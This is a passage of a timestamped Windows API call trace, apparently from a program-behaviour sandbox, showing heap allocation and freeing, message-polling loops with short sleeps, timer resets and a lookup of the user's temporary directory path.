HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0288.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0288.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0288.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0288.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0288.615] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0288.615] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0288.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0288.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0288.615] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0288.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0288.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0288.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0288.616] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0288.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0288.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0288.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0288.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0288.616] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0288.616] timeGetTime () returned 0x482e4 [0288.616] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.616] Sleep (dwMilliseconds=0xa) [0288.632] timeGetTime () returned 0x482f3 [0288.632] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.632] Sleep (dwMilliseconds=0xa) [0288.647] timeGetTime () returned 0x48303 [0288.647] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.648] Sleep (dwMilliseconds=0xa) [0288.663] timeGetTime () returned 0x48313 [0288.663] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.663] Sleep (dwMilliseconds=0xa) [0288.678] timeGetTime () returned 0x48322 [0288.679] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.679] Sleep (dwMilliseconds=0xa) [0288.694] timeGetTime () returned 0x48332 [0288.694] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.694] Sleep (dwMilliseconds=0xa) [0288.710] timeGetTime () returned 0x48341 [0288.710] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.710] Sleep (dwMilliseconds=0xa) [0288.727] timeGetTime () returned 0x48351 [0288.727] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.727] Sleep (dwMilliseconds=0xa) [0288.741] timeGetTime () returned 0x48361 [0288.741] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.741] Sleep (dwMilliseconds=0xa) [0288.756] timeGetTime () returned 0x48370 [0288.756] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.756] Sleep (dwMilliseconds=0xa) [0288.772] timeGetTime () returned 0x48380 [0288.772] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.772] Sleep (dwMilliseconds=0xa) [0288.788] timeGetTime () returned 0x4838f [0288.788] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.788] Sleep (dwMilliseconds=0xa) [0288.803] timeGetTime () returned 0x4839f [0288.804] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.804] Sleep (dwMilliseconds=0xa) [0288.819] timeGetTime () returned 0x483af [0288.819] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.819] Sleep (dwMilliseconds=0xa) [0288.834] timeGetTime () returned 0x483be [0288.835] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.835] Sleep (dwMilliseconds=0xa) [0288.850] timeGetTime () returned 0x483ce [0288.850] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.850] Sleep (dwMilliseconds=0xa) [0288.866] timeGetTime () returned 0x483dd [0288.866] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.866] Sleep (dwMilliseconds=0xa) [0288.881] timeGetTime () returned 0x483ed [0288.881] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.881] Sleep (dwMilliseconds=0xa) [0288.897] timeGetTime () returned 0x483fd [0288.897] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0288.897] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0288.897] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0288.897] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0288.897] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0288.897] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.897] Sleep (dwMilliseconds=0xa) [0288.913] timeGetTime () returned 0x4840c [0288.913] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.913] Sleep (dwMilliseconds=0xa) [0288.928] timeGetTime () returned 0x4841c [0288.928] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.928] Sleep (dwMilliseconds=0xa) [0288.954] timeGetTime () returned 0x4842b [0288.954] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.954] Sleep (dwMilliseconds=0xa) [0288.963] timeGetTime () returned 0x4843b [0288.963] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.964] Sleep (dwMilliseconds=0xa) [0288.975] timeGetTime () returned 0x4844b [0288.975] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.975] Sleep (dwMilliseconds=0xa) [0288.990] timeGetTime () returned 0x4845a [0288.990] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0288.990] Sleep (dwMilliseconds=0xa) [0289.006] timeGetTime () returned 0x4846a [0289.006] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.006] Sleep (dwMilliseconds=0xa) [0289.023] timeGetTime () returned 0x48479 [0289.023] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.023] Sleep (dwMilliseconds=0xa) [0289.037] timeGetTime () returned 0x48489 [0289.037] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.037] Sleep (dwMilliseconds=0xa) [0289.053] timeGetTime () returned 0x48499 [0289.053] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.053] Sleep (dwMilliseconds=0xa) [0289.068] timeGetTime () returned 0x484a8 [0289.068] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.068] Sleep (dwMilliseconds=0xa) [0289.084] timeGetTime () returned 0x484b8 [0289.084] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.084] Sleep (dwMilliseconds=0xa) [0289.100] timeGetTime () returned 0x484c7 [0289.100] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.100] Sleep (dwMilliseconds=0xa) [0289.116] timeGetTime () returned 0x484d7 [0289.116] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.116] Sleep (dwMilliseconds=0xa) [0289.131] timeGetTime () returned 0x484e7 [0289.131] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.131] Sleep (dwMilliseconds=0xa) [0289.147] timeGetTime () returned 0x484f6 [0289.147] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.147] Sleep (dwMilliseconds=0xa) [0289.162] timeGetTime () returned 0x48506 [0289.162] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.162] Sleep (dwMilliseconds=0xa) [0289.177] timeGetTime () returned 0x48515 [0289.178] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.178] Sleep (dwMilliseconds=0xa) [0289.193] timeGetTime () returned 0x48525 [0289.193] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.193] Sleep (dwMilliseconds=0xa) [0289.209] timeGetTime () returned 0x48535 [0289.209] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.209] Sleep (dwMilliseconds=0xa) [0289.224] timeGetTime () returned 0x48544 [0289.224] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.224] Sleep (dwMilliseconds=0xa) [0289.240] timeGetTime () returned 0x48554 [0289.240] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.240] Sleep (dwMilliseconds=0xa) [0289.255] timeGetTime () returned 0x48563 [0289.256] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.256] Sleep (dwMilliseconds=0xa) [0289.271] timeGetTime () returned 0x48573 [0289.271] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.271] Sleep (dwMilliseconds=0xa) [0289.287] timeGetTime () returned 0x48583 [0289.287] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.287] Sleep (dwMilliseconds=0xa) [0289.302] timeGetTime () returned 0x48592 [0289.302] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.302] Sleep (dwMilliseconds=0xa) [0289.318] timeGetTime () returned 0x485a2 [0289.318] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.318] Sleep (dwMilliseconds=0xa) [0289.334] timeGetTime () returned 0x485b1 [0289.334] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.334] Sleep (dwMilliseconds=0xa) [0289.350] timeGetTime () returned 0x485c1 [0289.350] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.350] Sleep (dwMilliseconds=0xa) [0289.365] timeGetTime () returned 0x485d1 [0289.365] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.365] Sleep (dwMilliseconds=0xa) [0289.380] timeGetTime () returned 0x485e0 [0289.380] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.380] Sleep (dwMilliseconds=0xa) [0289.396] timeGetTime () returned 0x485f0 [0289.396] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.396] Sleep (dwMilliseconds=0xa) [0289.412] timeGetTime () returned 0x485ff [0289.412] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.412] Sleep (dwMilliseconds=0xa) [0289.428] timeGetTime () returned 0x4860f [0289.429] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.429] Sleep (dwMilliseconds=0xa) [0289.443] timeGetTime () returned 0x4861f [0289.443] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.443] Sleep (dwMilliseconds=0xa) [0289.459] timeGetTime () returned 0x4862e [0289.459] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.459] Sleep (dwMilliseconds=0xa) [0289.474] timeGetTime () returned 0x4863e [0289.474] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.474] Sleep (dwMilliseconds=0xa) [0289.489] timeGetTime () returned 0x4864d [0289.490] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.490] Sleep (dwMilliseconds=0xa) [0289.506] timeGetTime () returned 0x4865d [0289.506] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.507] Sleep (dwMilliseconds=0xa) [0289.521] timeGetTime () returned 0x4866d [0289.521] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.521] Sleep (dwMilliseconds=0xa) [0289.536] timeGetTime () returned 0x4867c [0289.536] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.537] Sleep (dwMilliseconds=0xa) [0289.552] timeGetTime () returned 0x4868c [0289.552] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.553] Sleep (dwMilliseconds=0xa) [0289.568] timeGetTime () returned 0x4869b [0289.568] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.568] Sleep (dwMilliseconds=0xa) [0289.584] timeGetTime () returned 0x486ab [0289.584] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.584] Sleep (dwMilliseconds=0xa) [0289.599] timeGetTime () returned 0x486bb [0289.599] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.599] Sleep (dwMilliseconds=0xa) [0289.614] timeGetTime () returned 0x486ca [0289.614] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0289.615] Sleep (dwMilliseconds=0xa) [0289.630] timeGetTime () returned 0x486da [0289.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0289.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0289.631] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0289.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0289.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0289.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0289.631] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0289.631] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0289.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0289.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0289.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0289.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0289.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0289.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0289.632] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0289.632] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0289.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0289.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0289.633] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0289.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0289.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0289.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa820 [0289.636] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0289.636] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0289.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0289.637] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0289.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0289.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0289.637] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0289.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa30 [0289.638] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0289.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0289.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0289.638] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf440 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0289.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaaa8 [0289.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0289.638] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2dd8 [0289.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0289.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0289.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0289.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa30 | out: hHeap=0x25c0000) returned 1 [0289.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0289.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0289.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0289.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa820 | out: hHeap=0x25c0000) returned 1 [0289.639] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0289.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0289.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0289.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0289.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0289.640] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0289.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0289.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0289.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0289.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0289.640] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0289.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0289.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0289.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab08 [0289.641] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0289.641] 